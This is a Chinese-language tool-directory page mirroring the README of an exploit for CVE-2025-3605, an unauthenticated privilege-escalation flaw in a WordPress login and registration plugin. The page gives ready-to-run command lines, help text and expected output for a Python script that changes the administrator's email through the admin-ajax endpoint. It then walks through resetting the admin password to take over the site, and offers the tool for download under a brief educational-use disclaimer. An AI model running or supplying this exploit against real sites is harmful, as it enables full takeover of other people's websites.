Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2025-3605
权限提升密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-3605

CVE-2025-3605

WordPress Frontend Login and Registration Blocks 插件 <= 1.0.7 存在权限提升漏洞

查看仓库
231年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚀 CVE-2025-3605 漏洞利用指南

🛡️ 漏洞摘要

WordPress 的 Frontend Login and Registration Blocks 插件(版本 <= 1.0.7)存在通过账户接管实现权限提升的漏洞。
问题在于该插件在通过 flr_blocks_user_settings_handle_ajax_callback() 函数更新电子邮件等敏感信息时,未验证用户身份。

✅ 影响:
未经认证的攻击者可以更改管理员的电子邮件地址,触发"忘记密码"流程,并重置管理员密码,从而获得完全控制权。


💥 概念验证(PoC)

随附的 Python 脚本通过针对易受攻击的 AJAX 端点来自动化利用过程:

root@kitploit:~
/wp-admin/admin-ajax.php

它将目标用户(通常为管理员,user_id 为 1)的电子邮件更新为攻击者控制的电子邮件地址。


📦 附带的脚本

文件名: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ 默认值:

  • --user_id:1(默认管理员)
  • --mail:[email protected]

🖥️ 用法与帮助

要查看帮助菜单,请运行:

root@kitploit:~
python CVE-2025-3605.py --help

输出:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ 示例运行:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 预期输出

✅ 成功时:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ 失败时:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 利用之后

1️⃣ 导航到:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ 输入你设置的新电子邮件([email protected])。

3️⃣ 请求密码重置。

4️⃣ 设置新密码。

5️⃣ 以管理员身份登录并享受完全访问权限。


⚠️ 免责声明

此漏洞利用及脚本仅供教育和授权测试之用。
对你不拥有或无明确测试授权的系统进行任何未经授权的使用都是非法且不道德的。


作者:Khaled Alenazi(Nxploited)

下载工具